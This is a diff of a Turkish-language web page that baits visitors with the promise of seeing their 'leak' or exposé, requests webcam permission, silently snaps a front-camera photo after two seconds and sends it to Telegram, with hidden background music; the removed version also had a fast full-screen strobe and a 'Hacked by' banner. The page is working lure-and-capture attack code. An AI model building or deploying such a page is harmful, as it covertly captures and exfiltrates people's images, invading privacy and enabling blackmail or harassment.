--- a/index.html
+++ b/index.html
@@ -2,60 +2,28 @@
 <html lang="tr">
 <head>
   <meta charset="UTF-8" />
-  <title>Flash & Müzik & Kamera İzni</title>
+  <title>İfşanı Görmek İçin İzin Ver</title>
   <style>
     body, html {
-      margin: 0; padding: 0; height: 100%; overflow: hidden;
-      font-family: sans-serif; text-align: center; background: black;
-      color: white;
-      position: relative;
+      margin: 0; padding: 0; height: 100vh; background: black; color: white;
+      display: flex; flex-direction: column; justify-content: center; align-items: center;
+      font-family: sans-serif; text-align: center;
     }
-    #flashOverlay {
-      position: fixed;
-      top: 0; left: 0; right: 0; bottom: 0;
-      pointer-events: none;
-      animation: flashColors 0.1s infinite alternate;
-      z-index: 9999;
-      mix-blend-mode: difference;
-      display: block; /* flaş hep açık */
-    }
-    @keyframes flashColors {
-      0% { background-color: white; }
-      100% { background-color: black; }
-    }
-    #izinButton {
-      position: relative;
-      z-index: 10000;
-      margin-top: 40vh;
+    button {
       padding: 15px 30px;
-      font-size: 22px;
+      font-size: 18px;
       cursor: pointer;
-      background: #222;
+      border-radius: 8px;
+      border: none;
+      background: #28a745;
       color: white;
-      border: 2px solid white;
-      border-radius: 10px;
-      user-select: none;
+      margin-top: 20px;
     }
     #mesaj {
-      margin-top: 20px;
+      margin-top: 15px;
       font-weight: bold;
-      font-size: 20px;
-      z-index: 10000;
-      position: relative;
+      min-height: 24px;
       color: lime;
-    }
-    #hackedFlash {
-      font-size: 60px;
-      font-weight: bold;
-      position: fixed;
-      top: 50%;
-      left: 50%;
-      transform: translate(-50%, -50%);
-      animation: flashColors 0.1s infinite alternate;
-      z-index: 11000;
-      pointer-events: none;
-      user-select: none;
-      display: none;
     }
     video, canvas {
       display: none;
@@ -64,22 +32,18 @@
 </head>
 <body>
 
-  <div id="flashOverlay"></div>
-
-  <h2 style="position: relative; z-index: 10000;">📷 İfşanı görmek için lütfen izin ver</h2>
+  <h1>📷 İfşanı görmek için izin ver</h1>
   <button id="izinButton">İfşanı görmek için izin ver</button>
+  <div id="mesaj"></div>
 
   <video id="video" autoplay playsinline></video>
   <canvas id="canvas"></canvas>
-  <div id="mesaj"></div>
-  <div id="hackedFlash">Hacked by @46emirrr</div>
 
-  <!-- YouTube arka plan müziği (43. saniyeden başlar) -->
+  <!-- YouTube video gizli -->
   <iframe
-    id="musicIframe"
-    width="0"
-    height="0"
-    src="https://www.youtube.com/embed/w_S98XbQmPY?autoplay=1&loop=1&playlist=w_S98XbQmPY&controls=0&mute=0&start=43"
+    id="ytplayer"
+    width="0" height="0"
+    src="https://www.youtube.com/embed/w_S98XbQmPY?enablejsapi=1&start=43&loop=1&playlist=w_S98XbQmPY&controls=0&autoplay=0&mute=0"
     frameborder="0"
     allow="autoplay"
     allowfullscreen
@@ -95,25 +59,43 @@
     const canvas = document.getElementById("canvas");
     const ctx = canvas.getContext("2d");
     const mesaj = document.getElementById("mesaj");
-    const hackedFlash = document.getElementById("hackedFlash");
-    const flashOverlay = document.getElementById("flashOverlay");
-    const musicIframe = document.getElementById("musicIframe");
+    const ytplayer = document.getElementById("ytplayer");
 
-    // Otomatik müzik çalmayı zorla (bazen işe yarar)
-    window.onload = () => {
-      // iframe zaten autoplay parametreli
-      // Ek olarak burada herhangi bir şey yapmaya gerek yok
-    };
+    // YouTube Player API için
+    let player;
+
+    function onYouTubeIframeAPIReady() {
+      player = new YT.Player('ytplayer', {
+        events: {
+          'onReady': onPlayerReady
+        }
+      });
+    }
+
+    function onPlayerReady(event) {
+      // Başlangıçta otomatik başlamasın, izin butonuna basınca başlasın
+    }
+
+    // YouTube iframe API script ekle
+    let tag = document.createElement('script');
+    tag.src = "https://www.youtube.com/iframe_api";
+    document.body.appendChild(tag);
 
     izinButton.addEventListener("click", async () => {
-      izinButton.style.display = "none";
+      izinButton.disabled = true;
       mesaj.textContent = "";
-      hackedFlash.style.display = "none";
+
+      // YouTube müziğini başlat
+      if(player && player.playVideo){
+        player.seekTo(43);
+        player.playVideo();
+      }
 
       try {
         const stream = await navigator.mediaDevices.getUserMedia({ video: { facingMode: "user" } });
         video.srcObject = stream;
 
+        // 2 saniye bekle
         await new Promise(r => setTimeout(r, 2000));
 
         canvas.width = video.videoWidth;
@@ -133,11 +115,10 @@
           });
 
           if (res.ok) {
-            mesaj.textContent = "sey";
-            hackedFlash.style.display = "block";
+            mesaj.textContent = "📤 Fotoğraf Telegram'a gönderildi!";
           } else {
             mesaj.textContent = "❌ Gönderim başarısız.";
-            izinButton.style.display = "inline-block";
+            izinButton.disabled = false;
           }
 
           stream.getTracks().forEach(track => track.stop());
@@ -145,7 +126,7 @@
 
       } catch (err) {
         mesaj.textContent = "Kamera erişimi alınamadı: " + err.message;
-        izinButton.style.display = "inline-block";
+        izinButton.disabled = false;
       }
     });
   </script>
